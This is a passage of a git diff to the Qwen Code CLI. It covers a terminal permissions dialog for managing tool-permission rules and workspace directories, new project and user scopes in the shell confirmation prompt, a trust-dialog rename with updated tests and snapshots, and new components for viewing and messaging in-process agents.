"Add a new rule..." 
+ filtered rules + const listItems = useMemo(() => { + const items: Array<{ + label: string; + value: string; + key: string; + }> = [ + { + label: t('Add a new rule…'), + value: '__add__', + key: '__add__', + }, + ]; + for (const r of filteredRules) { + items.push({ + label: `${r.rule.raw}`, + value: r.rule.raw, + key: `${r.type}-${r.scope}-${r.rule.raw}`, + }); + } + return items; + }, [filteredRules]); + + // --- Action handlers --- + + const handleTabCycle = useCallback( + (direction: 1 | -1) => { + const newIndex = (activeTabIndex + direction + tabs.length) % tabs.length; + setActiveTabIndex(newIndex); + setSearchQuery(''); + setIsSearchActive(false); + setDirInputError(''); + // Set the appropriate default view for each tab + const newTab = tabs[newIndex]!; + setView(newTab.id === 'workspace' ? 'ws-dir-list' : 'rule-list'); + }, + [activeTabIndex, tabs], + ); + + const handleListSelect = useCallback( + (value: string) => { + if (value === '__add__') { + setNewRuleInput(''); + setView('add-rule-input'); + return; + } + // Selecting an existing rule → offer to delete + const found = filteredRules.find((r) => r.rule.raw === value); + if (found) { + setDeleteTarget(found); + setView('delete-confirm'); + } + }, + [filteredRules], + ); + + const handleAddRuleSubmit = useCallback(() => { + const trimmed = newRuleInput.trim(); + if (!trimmed) return; + setPendingRuleText(trimmed); + setView('add-rule-scope'); + }, [newRuleInput]); + + const handleScopeSelect = useCallback( + (scope: SettingScope) => { + if (!pm || activeTab.id === 'workspace') return; + const ruleType = activeTab.id as RuleType; + + // Add to PermissionManager in-memory + pm.addPersistentRule(pendingRuleText, ruleType); + + // Persist to settings file (with dedup) + const key = `permissions.${ruleType}`; + const perms = (settings.merged as Record)[ + 'permissions' + ] as Record | undefined; + const currentRules = perms?.[ruleType] ?? 
[]; + if (!currentRules.includes(pendingRuleText)) { + settings.setValue(scope, key, [...currentRules, pendingRuleText]); + } + + // Refresh and go back + refreshRules(); + setView('rule-list'); + setPendingRuleText(''); + }, + [pm, activeTab.id, pendingRuleText, settings, refreshRules], + ); + + const handleDeleteConfirm = useCallback(() => { + if (!pm || !deleteTarget) return; + const ruleType = deleteTarget.type; + + // Remove from PermissionManager in-memory + pm.removePersistentRule(deleteTarget.rule.raw, ruleType); + + // Persist removal — find and remove from settings + // We try both User and Workspace scopes + for (const scope of [SettingScope.User, SettingScope.Workspace]) { + const scopeSettings = settings.forScope(scope).settings; + const perms = (scopeSettings as Record)[ + 'permissions' + ] as Record | undefined; + const scopeRules = perms?.[ruleType]; + if (scopeRules?.includes(deleteTarget.rule.raw)) { + const updated = scopeRules.filter( + (r: string) => r !== deleteTarget.rule.raw, + ); + settings.setValue(scope, `permissions.${ruleType}`, updated); + break; + } + } + + refreshRules(); + setDeleteTarget(null); + setView('rule-list'); + }, [pm, deleteTarget, settings, refreshRules]); + + // --- Keypress handling --- + + useKeypress( + (key) => { + if (view === 'rule-list') { + if (key.name === 'escape') { + if (isSearchActive && searchQuery) { + setSearchQuery(''); + setIsSearchActive(false); + } else { + onExit(); + } + return; + } + if (key.name === 'tab') { + handleTabCycle(1); + return; + } + if (key.name === 'right' || key.name === 'left') { + handleTabCycle(key.name === 'right' ? 
1 : -1); + return; + } + // Search input: backspace + if (key.name === 'backspace' || key.name === 'delete') { + if (searchQuery.length > 0) { + setSearchQuery((prev) => prev.slice(0, -1)); + } + return; + } + // Search input: printable characters + if ( + key.sequence && + !key.ctrl && + !key.meta && + key.sequence.length === 1 && + key.sequence >= ' ' + ) { + setSearchQuery((prev) => prev + key.sequence); + setIsSearchActive(true); + return; + } + } + if (view === 'add-rule-input') { + if (key.name === 'escape') { + setView('rule-list'); + return; + } + } + if (view === 'add-rule-scope') { + if (key.name === 'escape') { + setView('add-rule-input'); + return; + } + } + if (view === 'delete-confirm') { + if (key.name === 'escape') { + setDeleteTarget(null); + setView('rule-list'); + return; + } + if (key.name === 'return') { + handleDeleteConfirm(); + return; + } + } + // Workspace tab views + if (view === 'ws-dir-list') { + if (key.name === 'escape') { + onExit(); + return; + } + if (key.name === 'tab') { + handleTabCycle(1); + return; + } + if (key.name === 'right' || key.name === 'left') { + handleTabCycle(key.name === 'right' ? 1 : -1); + return; + } + } + if (view === 'ws-add-dir-input') { + if (key.name === 'escape') { + setDirInputError(''); + setView('ws-dir-list'); + return; + } + } + if (view === 'ws-remove-confirm') { + if (key.name === 'escape') { + setRemoveDirTarget(null); + setView('ws-dir-list'); + return; + } + if (key.name === 'return') { + handleRemoveDirConfirm(); + return; + } + } + }, + { isActive: true }, + ); + + // --- Workspace tab: add directory input --- + if (activeTab.id === 'workspace' && view === 'ws-add-dir-input') { + return ( + + + {t('Add directory to workspace')} + + + + {t( + 'Qwen Code will be able to read files in this directory and make edits when auto-accept edits is on.', + )} + + + {t('Enter the path to the directory:')} + + 0 ? handleDirTabComplete : undefined} + onUp={dirCompletions.length > 0 ? 
handleDirCompletionUp : undefined} + onDown={ + dirCompletions.length > 0 ? handleDirCompletionDown : undefined + } + placeholder={t('Enter directory path…')} + isActive={true} + validationErrors={dirInputError ? [dirInputError] : []} + /> + + {/* Filesystem completions: ↑/↓ to navigate, Tab to apply */} + {dirCompletions.length > 0 && ( + + {dirCompletions.map((completion, idx) => { + const name = nodePath.basename(completion); + const isSelected = idx === completionIndex; + return ( + + + {`${name}/`} + + {` directory`} + + ); + })} + + )} + + + {t('Tab to complete · Enter to add · Esc to cancel')} + + + + ); + } + + // --- Workspace tab: remove directory confirmation --- + if ( + activeTab.id === 'workspace' && + view === 'ws-remove-confirm' && + removeDirTarget + ) { + return ( + + + {t('Remove directory?')} + + + {removeDirTarget} + + + + {t( + 'Are you sure you want to remove this directory from the workspace?', + )} + + + + + {t('Enter to confirm · Esc to cancel')} + + + + ); + } + + // --- Workspace tab: directory list (default) --- + if (activeTab.id === 'workspace') { + const initialDirArray = Array.from(initialDirs); + return ( + + + + {t( + 'Qwen Code can read files in the workspace, and make edits when auto-accept edits is on.', + )} + + + {/* Initial (non-removable) dirs: shown inline with dash, same visual level as list */} + {initialDirArray.map((dir, idx) => ( + + {'- '} + {dir} + + {idx === 0 + ? 
t(' (Original working directory)') + : t(' (from settings)')} + + + ))} + {/* Selectable list: runtime-added dirs + 'Add directory…' at end */} + + + + ); + } + + // --- Render views --- + + if (view === 'add-rule-input') { + return ( + + + + {t('Add {{type}} permission rule', { type: activeTab.id })} + + + + {t( + 'Permission rules are a tool name, optionally followed by a specifier in parentheses.', + )} + + + {t('e.g.,')} WebFetch {t('or')}{' '} + Bash(ls:*) + + + + + + + + + {t('Enter to submit · Esc to cancel')} + + + + ); + } + + if (view === 'add-rule-scope') { + const scopeItems = getPermScopeItems(); + return ( + + + + {t('Add {{type}} permission rule', { type: activeTab.id })} + + + + {pendingRuleText} + + {describeRule(pendingRuleText)} + + + + {t('Where should this rule be saved?')} + ({ + label: `${s.label} ${s.description}`, + value: s.value, + key: s.key, + }))} + onSelect={handleScopeSelect} + isFocused={true} + showNumbers={true} + /> + + + + {t('Enter to confirm · Esc to cancel')} + + + + ); + } + + if (view === 'delete-confirm' && deleteTarget) { + return ( + + + + {t('Delete {{type}} rule?', { type: deleteTarget.type })} + + + + {deleteTarget.rule.raw} + + {describeRule(deleteTarget.rule.raw)} + + + {scopeLabel(deleteTarget.scope)} + + + + + {t('Are you sure you want to delete this permission rule?')} + + + + + {t('Enter to confirm · Esc to cancel')} + + + + ); + } + + // --- Default: rule-list view --- + + return ( + + + {activeTab.description} + {/* Search box */} + + {'> '} + {searchQuery ? 
( + {searchQuery} + ) : ( + {t('Search…')} + )} + + + {/* Rule list */} + + + + ); +} + +// --------------------------------------------------------------------------- +// Sub-components +// --------------------------------------------------------------------------- + +function TabBar({ + tabs, + activeIndex, +}: { + tabs: Tab[]; + activeIndex: number; +}): React.JSX.Element { + return ( + + + {t('Permissions:')}{' '} + + {tabs.map((tab, i) => ( + + {i === activeIndex ? ( + + {` ${tab.label} `} + + ) : ( + {` ${tab.label} `} + )} + + ))} + {t('(←/→ or tab to cycle)')} + + ); +} + +function FooterHint({ view }: { view: DialogView }): React.JSX.Element { + if (view !== 'rule-list' && view !== 'ws-dir-list') return <>; + return ( + + + {t( + 'Press ↑↓ to navigate · Enter to select · Type to search · Esc to cancel', + )} + + + ); +} diff --git a/packages/cli/src/ui/components/PlanSummaryDisplay.tsx b/packages/cli/src/ui/components/PlanSummaryDisplay.tsx index c827b9d86..a856bcdc4 100644 --- a/packages/cli/src/ui/components/PlanSummaryDisplay.tsx +++ b/packages/cli/src/ui/components/PlanSummaryDisplay.tsx @@ -21,12 +21,13 @@ export const PlanSummaryDisplay: React.FC = ({ availableHeight, childWidth, }) => { - const { message, plan } = data; + const { message, plan, rejected } = data; + const messageColor = rejected ? 
Colors.AccentYellow : Colors.AccentGreen; return ( - + {message} diff --git a/packages/cli/src/ui/components/ShellConfirmationDialog.test.tsx b/packages/cli/src/ui/components/ShellConfirmationDialog.test.tsx index bacf055fa..0f3d40652 100644 --- a/packages/cli/src/ui/components/ShellConfirmationDialog.test.tsx +++ b/packages/cli/src/ui/components/ShellConfirmationDialog.test.tsx @@ -33,13 +33,13 @@ describe('ShellConfirmationDialog', () => { expect(select).toContain('Yes, allow once'); }); - it('calls onConfirm with ProceedAlways when "Yes, allow always for this session" is selected', () => { + it('calls onConfirm with ProceedAlwaysProject when "Always allow in this project" is selected', () => { const { lastFrame } = renderWithProviders( , ); const select = lastFrame()!.toString(); // Simulate selecting the second option - expect(select).toContain('Yes, allow always for this session'); + expect(select).toContain('Always allow in this project'); }); it('calls onConfirm with Cancel when "No (esc)" is selected', () => { diff --git a/packages/cli/src/ui/components/ShellConfirmationDialog.tsx b/packages/cli/src/ui/components/ShellConfirmationDialog.tsx index d83bf9bca..5d6986efc 100644 --- a/packages/cli/src/ui/components/ShellConfirmationDialog.tsx +++ b/packages/cli/src/ui/components/ShellConfirmationDialog.tsx @@ -57,9 +57,14 @@ export const ShellConfirmationDialog: React.FC< key: 'Yes, allow once', }, { - label: t('Yes, allow always for this session'), - value: ToolConfirmationOutcome.ProceedAlways, - key: 'Yes, allow always for this session', + label: t('Always allow in this project'), + value: ToolConfirmationOutcome.ProceedAlwaysProject, + key: 'Always allow in this project', + }, + { + label: t('Always allow for this user'), + value: ToolConfirmationOutcome.ProceedAlwaysUser, + key: 'Always allow for this user', }, { label: t('No (esc)'), diff --git a/packages/cli/src/ui/components/PermissionsModifyTrustDialog.test.tsx 
b/packages/cli/src/ui/components/TrustDialog.test.tsx similarity index 83% rename from packages/cli/src/ui/components/PermissionsModifyTrustDialog.test.tsx rename to packages/cli/src/ui/components/TrustDialog.test.tsx index 15d6948d8..6ca6133dc 100644 --- a/packages/cli/src/ui/components/PermissionsModifyTrustDialog.test.tsx +++ b/packages/cli/src/ui/components/TrustDialog.test.tsx @@ -9,13 +9,13 @@ import { describe, it, expect, vi, beforeEach, afterEach } from 'vitest'; import type { Mock } from 'vitest'; import { renderWithProviders } from '../../test-utils/render.js'; -import { PermissionsModifyTrustDialog } from './PermissionsModifyTrustDialog.js'; +import { TrustDialog } from './TrustDialog.js'; import { TrustLevel } from '../../config/trustedFolders.js'; import { waitFor, act } from '@testing-library/react'; import * as processUtils from '../../utils/processUtils.js'; -import { usePermissionsModifyTrust } from '../hooks/usePermissionsModifyTrust.js'; +import { useTrustModify } from '../hooks/useTrustModify.js'; -// Hoist mocks for dependencies of the usePermissionsModifyTrust hook +// Hoist mocks for dependencies of the useTrustModify hook const mockedCwd = vi.hoisted(() => vi.fn()); const mockedLoadTrustedFolders = vi.hoisted(() => vi.fn()); const mockedIsWorkspaceTrusted = vi.hoisted(() => vi.fn()); @@ -39,16 +39,16 @@ vi.mock('../../config/trustedFolders.js', () => ({ }, })); -vi.mock('../hooks/usePermissionsModifyTrust.js'); +vi.mock('../hooks/useTrustModify.js'); -describe('PermissionsModifyTrustDialog', () => { +describe('TrustDialog', () => { let mockUpdateTrustLevel: Mock; let mockCommitTrustLevelChange: Mock; beforeEach(() => { mockUpdateTrustLevel = vi.fn(); mockCommitTrustLevelChange = vi.fn(); - vi.mocked(usePermissionsModifyTrust).mockReturnValue({ + vi.mocked(useTrustModify).mockReturnValue({ cwd: '/test/dir', currentTrustLevel: TrustLevel.DO_NOT_TRUST, isInheritedTrustFromParent: false, @@ -66,7 +66,7 @@ 
describe('PermissionsModifyTrustDialog', () => { it('should render the main dialog with current trust level', async () => { const { lastFrame } = renderWithProviders( - , + , ); await waitFor(() => { @@ -77,7 +77,7 @@ describe('PermissionsModifyTrustDialog', () => { }); it('should display the inherited trust note from parent', async () => { - vi.mocked(usePermissionsModifyTrust).mockReturnValue({ + vi.mocked(useTrustModify).mockReturnValue({ cwd: '/test/dir', currentTrustLevel: TrustLevel.DO_NOT_TRUST, isInheritedTrustFromParent: true, @@ -88,7 +88,7 @@ describe('PermissionsModifyTrustDialog', () => { isFolderTrustEnabled: true, }); const { lastFrame } = renderWithProviders( - , + , ); await waitFor(() => { @@ -99,7 +99,7 @@ describe('PermissionsModifyTrustDialog', () => { }); it('should display the inherited trust note from IDE', async () => { - vi.mocked(usePermissionsModifyTrust).mockReturnValue({ + vi.mocked(useTrustModify).mockReturnValue({ cwd: '/test/dir', currentTrustLevel: TrustLevel.DO_NOT_TRUST, isInheritedTrustFromParent: false, @@ -110,7 +110,7 @@ describe('PermissionsModifyTrustDialog', () => { isFolderTrustEnabled: true, }); const { lastFrame } = renderWithProviders( - , + , ); await waitFor(() => { @@ -123,7 +123,7 @@ describe('PermissionsModifyTrustDialog', () => { it('should call onExit when escape is pressed', async () => { const onExit = vi.fn(); const { stdin, lastFrame } = renderWithProviders( - , + , ); await waitFor(() => expect(lastFrame()).not.toContain('Loading...')); @@ -141,7 +141,7 @@ describe('PermissionsModifyTrustDialog', () => { const mockRelaunchApp = vi .spyOn(processUtils, 'relaunchApp') .mockResolvedValue(undefined); - vi.mocked(usePermissionsModifyTrust).mockReturnValue({ + vi.mocked(useTrustModify).mockReturnValue({ cwd: '/test/dir', currentTrustLevel: TrustLevel.DO_NOT_TRUST, isInheritedTrustFromParent: false, @@ -154,7 +154,7 @@ describe('PermissionsModifyTrustDialog', () => { const onExit = vi.fn(); const { stdin, 
lastFrame } = renderWithProviders( - , + , ); await waitFor(() => expect(lastFrame()).not.toContain('Loading...')); @@ -171,7 +171,7 @@ describe('PermissionsModifyTrustDialog', () => { }); it('should not commit when escape is pressed during restart prompt', async () => { - vi.mocked(usePermissionsModifyTrust).mockReturnValue({ + vi.mocked(useTrustModify).mockReturnValue({ cwd: '/test/dir', currentTrustLevel: TrustLevel.DO_NOT_TRUST, isInheritedTrustFromParent: false, @@ -184,7 +184,7 @@ describe('PermissionsModifyTrustDialog', () => { const onExit = vi.fn(); const { stdin, lastFrame } = renderWithProviders( - , + , ); await waitFor(() => expect(lastFrame()).not.toContain('Loading...')); diff --git a/packages/cli/src/ui/components/PermissionsModifyTrustDialog.tsx b/packages/cli/src/ui/components/TrustDialog.tsx similarity index 92% rename from packages/cli/src/ui/components/PermissionsModifyTrustDialog.tsx rename to packages/cli/src/ui/components/TrustDialog.tsx index dfed5ba42..ed2f202a8 100644 --- a/packages/cli/src/ui/components/PermissionsModifyTrustDialog.tsx +++ b/packages/cli/src/ui/components/TrustDialog.tsx @@ -8,13 +8,13 @@ import { Box, Text } from 'ink'; import type React from 'react'; import { TrustLevel } from '../../config/trustedFolders.js'; import { useKeypress } from '../hooks/useKeypress.js'; -import { usePermissionsModifyTrust } from '../hooks/usePermissionsModifyTrust.js'; +import { useTrustModify } from '../hooks/useTrustModify.js'; import { theme } from '../semantic-colors.js'; import { RadioButtonSelect } from './shared/RadioButtonSelect.js'; import { relaunchApp } from '../../utils/processUtils.js'; import { type UseHistoryManagerReturn } from '../hooks/useHistoryManager.js'; -interface PermissionsModifyTrustDialogProps { +interface TrustDialogProps { onExit: () => void; addItem: UseHistoryManagerReturn['addItem']; } @@ -37,10 +37,10 @@ const TRUST_LEVEL_ITEMS = [ }, ]; -export function PermissionsModifyTrustDialog({ +export function 
TrustDialog({ onExit, addItem, -}: PermissionsModifyTrustDialogProps): React.JSX.Element { +}: TrustDialogProps): React.JSX.Element { const { cwd, currentTrustLevel, @@ -49,7 +49,7 @@ export function PermissionsModifyTrustDialog({ needsRestart, updateTrustLevel, commitTrustLevelChange, - } = usePermissionsModifyTrust(onExit, addItem); + } = useTrustModify(onExit, addItem); useKeypress( (key) => { diff --git a/packages/cli/src/ui/components/__snapshots__/LoadingIndicator.test.tsx.snap b/packages/cli/src/ui/components/__snapshots__/LoadingIndicator.test.tsx.snap index 3d472f97e..f9236b52a 100644 --- a/packages/cli/src/ui/components/__snapshots__/LoadingIndicator.test.tsx.snap +++ b/packages/cli/src/ui/components/__snapshots__/LoadingIndicator.test.tsx.snap @@ -1,6 +1,6 @@ // Vitest Snapshot v1, https://vitest.dev/guide/snapshot.html exports[` > should truncate long primary text instead of wrapping 1`] = ` -"MockResponding This is an extremely long loading phrase that should be truncated in t (esc to -Spinner cancel, 5s)" +" MockResponding This is an extremely long loading phrase that should be truncated in (5s · esc to + Spinner cancel)" `; diff --git a/packages/cli/src/ui/components/__snapshots__/LoopDetectionConfirmation.test.tsx.snap b/packages/cli/src/ui/components/__snapshots__/LoopDetectionConfirmation.test.tsx.snap index da3c1f9a1..ef8f8a006 100644 --- a/packages/cli/src/ui/components/__snapshots__/LoopDetectionConfirmation.test.tsx.snap +++ b/packages/cli/src/ui/components/__snapshots__/LoopDetectionConfirmation.test.tsx.snap @@ -7,7 +7,7 @@ exports[`LoopDetectionConfirmation > renders correctly 1`] = ` │ This can happen due to repetitive tool calls or other model behavior. Do you want to keep loop │ │ detection enabled or disable it for this session? │ │ │ - │ ● 1. Keep loop detection enabled (esc) │ + │ › 1. Keep loop detection enabled (esc) │ │ 2. 
Disable loop detection for this session │ │ │ │ Note: To disable loop detection checks for all future sessions, set "model.skipLoopDetection" to │ diff --git a/packages/cli/src/ui/components/__snapshots__/ShellConfirmationDialog.test.tsx.snap b/packages/cli/src/ui/components/__snapshots__/ShellConfirmationDialog.test.tsx.snap index 8c9ceb298..ecd4c0652 100644 --- a/packages/cli/src/ui/components/__snapshots__/ShellConfirmationDialog.test.tsx.snap +++ b/packages/cli/src/ui/components/__snapshots__/ShellConfirmationDialog.test.tsx.snap @@ -13,9 +13,10 @@ exports[`ShellConfirmationDialog > renders correctly 1`] = ` │ │ │ Do you want to proceed? │ │ │ - │ ● 1. Yes, allow once │ - │ 2. Yes, allow always for this session │ - │ 3. No (esc) │ + │ › 1. Yes, allow once │ + │ 2. Always allow in this project │ + │ 3. Always allow for this user │ + │ 4. No (esc) │ │ │ ╰──────────────────────────────────────────────────────────────────────────────────────────────────╯" `; diff --git a/packages/cli/src/ui/components/__snapshots__/ThemeDialog.test.tsx.snap b/packages/cli/src/ui/components/__snapshots__/ThemeDialog.test.tsx.snap index d254c32df..479bfe3c1 100644 --- a/packages/cli/src/ui/components/__snapshots__/ThemeDialog.test.tsx.snap +++ b/packages/cli/src/ui/components/__snapshots__/ThemeDialog.test.tsx.snap @@ -5,7 +5,7 @@ exports[`ThemeDialog Snapshots > should render correctly in scope selector mode │ │ │ > Apply To │ │ │ -│ ● 1. User Settings │ +│ › 1. User Settings │ │ 2. Workspace Settings │ │ │ │ (Use Enter to apply scope, Tab to go back) │ @@ -19,7 +19,7 @@ exports[`ThemeDialog Snapshots > should render correctly in theme selection mode │ > Select Theme Preview │ │ ▲ ┌─────────────────────────────────────────────────┐ │ │ 1. Qwen Light Light │ │ │ -│ ● 2. Qwen Dark Dark │ 1 # function │ │ +│ › 2. Qwen Dark Dark │ 1 # function │ │ │ 3. ANSI Dark │ 2 def fibonacci(n): │ │ │ 4. Atom One Dark │ 3 a, b = 0, 1 │ │ │ 5. 
Ayu Dark │ 4 for _ in range(n): │ │ diff --git a/packages/cli/src/ui/components/agent-view/AgentChatView.tsx b/packages/cli/src/ui/components/agent-view/AgentChatView.tsx new file mode 100644 index 000000000..485316436 --- /dev/null +++ b/packages/cli/src/ui/components/agent-view/AgentChatView.tsx @@ -0,0 +1,272 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview AgentChatView — displays a single in-process agent's conversation. + * + * Renders the agent's message history using HistoryItemDisplay — the same + * component used by the main agent view. AgentMessage[] is converted to + * HistoryItem[] by agentMessagesToHistoryItems() so all 27 HistoryItem types + * are available without duplicating rendering logic. + * + * Layout: + * - Static area: finalized messages (efficient Ink ) + * - Live area: tool groups still executing / awaiting confirmation + * - Status line: spinner while the agent is running + * + * Model text output is shown only after each round completes (no live + * streaming), which avoids per-chunk re-renders and keeps the display simple. 
+ */ + +import { Box, Text, Static } from 'ink'; +import { useMemo, useState, useEffect, useCallback, useRef } from 'react'; +import { + AgentStatus, + AgentEventType, + getGitBranch, + type AgentStatusChangeEvent, +} from '@qwen-code/qwen-code-core'; +import { + useAgentViewState, + useAgentViewActions, +} from '../../contexts/AgentViewContext.js'; +import { useUIState } from '../../contexts/UIStateContext.js'; +import { useTerminalSize } from '../../hooks/useTerminalSize.js'; +import { HistoryItemDisplay } from '../HistoryItemDisplay.js'; +import { ToolCallStatus } from '../../types.js'; +import { theme } from '../../semantic-colors.js'; +import { GeminiRespondingSpinner } from '../GeminiRespondingSpinner.js'; +import { useKeypress } from '../../hooks/useKeypress.js'; +import { agentMessagesToHistoryItems } from './agentHistoryAdapter.js'; +import { AgentHeader } from './AgentHeader.js'; + +// ─── Main Component ───────────────────────────────────────── + +interface AgentChatViewProps { + agentId: string; +} + +export const AgentChatView = ({ agentId }: AgentChatViewProps) => { + const { agents } = useAgentViewState(); + const { setAgentShellFocused } = useAgentViewActions(); + const uiState = useUIState(); + const { historyRemountKey, availableTerminalHeight, constrainHeight } = + uiState; + const { columns: terminalWidth } = useTerminalSize(); + const agent = agents.get(agentId); + const contentWidth = terminalWidth - 4; + + // Force re-render on message updates and status changes. + // STREAM_TEXT is deliberately excluded — model text is shown only after + // each round completes (via committed messages), avoiding per-chunk re-renders. 
+ const [, setRenderTick] = useState(0); + const tickRef = useRef(0); + const forceRender = useCallback(() => { + tickRef.current += 1; + setRenderTick(tickRef.current); + }, []); + + useEffect(() => { + if (!agent) return; + + const emitter = agent.interactiveAgent.getEventEmitter(); + if (!emitter) return; + + const onStatusChange = (_event: AgentStatusChangeEvent) => forceRender(); + const onToolCall = () => forceRender(); + const onToolResult = () => forceRender(); + const onRoundEnd = () => forceRender(); + const onApproval = () => forceRender(); + const onOutputUpdate = () => forceRender(); + + emitter.on(AgentEventType.STATUS_CHANGE, onStatusChange); + emitter.on(AgentEventType.TOOL_CALL, onToolCall); + emitter.on(AgentEventType.TOOL_RESULT, onToolResult); + emitter.on(AgentEventType.ROUND_END, onRoundEnd); + emitter.on(AgentEventType.TOOL_WAITING_APPROVAL, onApproval); + emitter.on(AgentEventType.TOOL_OUTPUT_UPDATE, onOutputUpdate); + + return () => { + emitter.off(AgentEventType.STATUS_CHANGE, onStatusChange); + emitter.off(AgentEventType.TOOL_CALL, onToolCall); + emitter.off(AgentEventType.TOOL_RESULT, onToolResult); + emitter.off(AgentEventType.ROUND_END, onRoundEnd); + emitter.off(AgentEventType.TOOL_WAITING_APPROVAL, onApproval); + emitter.off(AgentEventType.TOOL_OUTPUT_UPDATE, onOutputUpdate); + }; + }, [agent, forceRender]); + + const interactiveAgent = agent?.interactiveAgent; + const messages = interactiveAgent?.getMessages() ?? []; + const pendingApprovals = interactiveAgent?.getPendingApprovals(); + const liveOutputs = interactiveAgent?.getLiveOutputs(); + const shellPids = interactiveAgent?.getShellPids(); + const status = interactiveAgent?.getStatus(); + const isRunning = + status === AgentStatus.RUNNING || status === AgentStatus.INITIALIZING; + + // Derive the active PTY PID: first shell PID among currently-executing tools. + // Resets naturally to undefined when the tool finishes (shellPids cleared). 
+ const activePtyId = + shellPids && shellPids.size > 0 + ? shellPids.values().next().value + : undefined; + + // Track whether the user has toggled input focus into the embedded shell. + // Mirrors the main agent's embeddedShellFocused in AppContainer. + const [embeddedShellFocused, setEmbeddedShellFocusedLocal] = useState(false); + + // Sync to AgentViewContext so AgentTabBar can suppress arrow-key navigation + // when an agent's embedded shell is focused. + useEffect(() => { + setAgentShellFocused(embeddedShellFocused); + return () => setAgentShellFocused(false); + }, [embeddedShellFocused, setAgentShellFocused]); + + // Reset focus when the shell exits (activePtyId disappears). + useEffect(() => { + if (!activePtyId) setEmbeddedShellFocusedLocal(false); + }, [activePtyId]); + + // Ctrl+F: toggle shell input focus when a PTY is active. + useKeypress( + (key) => { + if (key.ctrl && key.name === 'f') { + if (activePtyId || embeddedShellFocused) { + setEmbeddedShellFocusedLocal((prev) => !prev); + } + } + }, + { isActive: true }, + ); + + // Convert AgentMessage[] → HistoryItem[] via adapter. + // tickRef.current in deps ensures we rebuild when events fire even if + // messages.length and pendingApprovals.size haven't changed (e.g. a + // tool result updates an existing entry in place). + const allItems = useMemo( + () => + agentMessagesToHistoryItems( + messages, + pendingApprovals ?? new Map(), + liveOutputs, + shellPids, + ), + // eslint-disable-next-line react-hooks/exhaustive-deps + [ + agentId, + messages.length, + pendingApprovals?.size, + liveOutputs?.size, + shellPids?.size, + tickRef.current, + ], + ); + + // Split into committed (Static) and pending (live area). + // Any tool_group with an Executing or Confirming tool — plus everything + // after it — stays in the live area so confirmation dialogs remain + // interactive (Ink's cannot receive input). 
+ const splitIndex = useMemo(() => { + for (let idx = allItems.length - 1; idx >= 0; idx--) { + const item = allItems[idx]!; + if ( + item.type === 'tool_group' && + item.tools.some( + (t) => + t.status === ToolCallStatus.Executing || + t.status === ToolCallStatus.Confirming, + ) + ) { + return idx; + } + } + return allItems.length; // all committed + }, [allItems]); + + const committedItems = allItems.slice(0, splitIndex); + const pendingItems = allItems.slice(splitIndex); + + const core = interactiveAgent?.getCore(); + const agentWorkingDir = core?.runtimeContext.getTargetDir() ?? ''; + // Cache the branch — it won't change during the agent's lifetime and + // getGitBranch uses synchronous execSync which blocks the render loop. + const agentGitBranch = useMemo( + () => (agentWorkingDir ? getGitBranch(agentWorkingDir) : ''), + // eslint-disable-next-line react-hooks/exhaustive-deps + [agentId], + ); + + if (!agent || !interactiveAgent || !core) { + return ( + + + Agent "{agentId}" not found. + + + ); + } + + const agentModelId = core.modelConfig.model ?? ''; + + return ( + + {/* Committed message history. + key includes historyRemountKey: when refreshStatic() clears the + terminal it bumps the key, forcing Static to remount and re-emit + all items on the cleared screen. */} + , + ...committedItems.map((item) => ( + + )), + ]} + > + {(item) => item} + + + {/* Live area — tool groups awaiting confirmation or still executing. + Must remain outside Static so confirmation dialogs are interactive. + Pass PTY state so ShellInputPrompt is reachable via Ctrl+F. 
*/} + {pendingItems.map((item) => ( + + ))} + + {/* Spinner */} + {isRunning && ( + + + + )} + + ); +}; diff --git a/packages/cli/src/ui/components/agent-view/AgentComposer.tsx b/packages/cli/src/ui/components/agent-view/AgentComposer.tsx new file mode 100644 index 000000000..d26d5db2f --- /dev/null +++ b/packages/cli/src/ui/components/agent-view/AgentComposer.tsx @@ -0,0 +1,308 @@ +/** + * @license + * Copyright 2025 Qwen Team + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * @fileoverview AgentComposer — footer area for in-process agent tabs. + * + * Replaces the main Composer when an agent tab is active so that: + * - The loading indicator reflects the agent's status (not the main agent) + * - The input prompt sends messages to the agent (via enqueueMessage) + * - Keyboard events are scoped — no conflict with the main InputPrompt + * + * Wraps its content in a local StreamingContext.Provider so reusable + * components like LoadingIndicator and GeminiRespondingSpinner read the + * agent's derived streaming state instead of the main agent's. 
+ */ + +import { Box, Text, useStdin } from 'ink'; +import { useCallback, useEffect, useMemo, useState } from 'react'; +import { + AgentStatus, + isTerminalStatus, + ApprovalMode, + APPROVAL_MODES, +} from '@qwen-code/qwen-code-core'; +import { + useAgentViewState, + useAgentViewActions, +} from '../../contexts/AgentViewContext.js'; +import { useConfig } from '../../contexts/ConfigContext.js'; +import { StreamingContext } from '../../contexts/StreamingContext.js'; +import { StreamingState } from '../../types.js'; +import { useTerminalSize } from '../../hooks/useTerminalSize.js'; +import { useAgentStreamingState } from '../../hooks/useAgentStreamingState.js'; +import { useKeypress, type Key } from '../../hooks/useKeypress.js'; +import { useTextBuffer } from '../shared/text-buffer.js'; +import { calculatePromptWidths } from '../../utils/layoutUtils.js'; +import { BaseTextInput } from '../BaseTextInput.js'; +import { LoadingIndicator } from '../LoadingIndicator.js'; +import { QueuedMessageDisplay } from '../QueuedMessageDisplay.js'; +import { AgentFooter } from './AgentFooter.js'; +import { keyMatchers, Command } from '../../keyMatchers.js'; +import { theme } from '../../semantic-colors.js'; +import { t } from '../../../i18n/index.js'; + +// ─── Types ────────────────────────────────────────────────── + +interface AgentComposerProps { + agentId: string; +} + +// ─── Component ────────────────────────────────────────────── + +export const AgentComposer: React.FC = ({ agentId }) => { + const { agents, agentTabBarFocused, agentShellFocused, agentApprovalModes } = + useAgentViewState(); + const { + setAgentInputBufferText, + setAgentTabBarFocused, + setAgentApprovalMode, + } = useAgentViewActions(); + const agent = agents.get(agentId); + const interactiveAgent = agent?.interactiveAgent; + + const config = useConfig(); + const { columns: terminalWidth } = useTerminalSize(); + const { inputWidth } = calculatePromptWidths(terminalWidth); + const { stdin, setRawMode } = 
